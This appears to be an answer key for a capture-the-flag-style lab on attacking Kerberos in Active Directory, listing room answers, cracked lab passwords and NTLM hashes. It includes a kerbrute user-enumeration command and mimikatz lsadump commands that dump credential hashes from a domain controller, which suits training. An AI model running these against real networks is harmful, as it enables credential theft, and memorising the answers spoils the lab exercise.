Introduction

What does TGT stand for?

Ticket Granting Ticket

What does SPN stand for?

Service Principal Name

What does PAC stand for?

Privilege Attribute Certificate

What two services make up the KDC?

TGS, AS

Deploy the Machine

Enumeration w/ Kerbrute

How many total users do we enumerate?

Run kerbrute userenum --dc=IP -d=CONTROLLER.local User.txt

10

What is the SQL service account name?

sqlservice

What is the second "machine" account name?

machine2

What is the third "user" account name?

user3

Task 3 Harvesting & Brute-Forcing Tickets w/ Rubeus

Which domain admin do we get a ticket for when harvesting tickets?

Administrator

Which domain controller do we get a ticket for when harvesting tickets?

CONTROLLER-1

Kerberoasting w/ Rubeus & Impacket

What is the HTTPService Password?

Summer2020

What is the SQLService Password?

MYPassword123

AS-REP Roasting w/ Rubeus

What hash type does AS-REP Roasting use?

Kerberos 5, etype 23, AS-REP

Which User is vulnerable to AS-REP Roasting?

User3

What is the User's Password?

Password3

Which Admin is vulnerable to AS-REP Roasting?

Admin2

What is the Admin's Password?

P@$$W0rd2

Pass the Ticket w/ mimikatz

I understand how a pass the ticket attack works

No answer needed

Golden/Silver Ticket Attacks w/ mimikatz

What is the SQLService NTLM Hash?

Run mimikatz.exe and in mimikatz run privilege::debug to make sure everything works properly. Run lsadump::lsa /inject /name:SQLService.

cd40c9ed96265531b21fc5b1dafcfb0a

What is the Administrator NTLM Hash?

Run lsadump::lsa /inject /name:Administrator.

2777b7fec870e04dda00cd7260f7bee6

Kerberos Backdoors w/ mimikatz

I understand how to implant a skeleton key into a domain controller with mimikatz

No answer needed

Conclusion

I Understand the Basics of Attacking Kerberos

No answer needed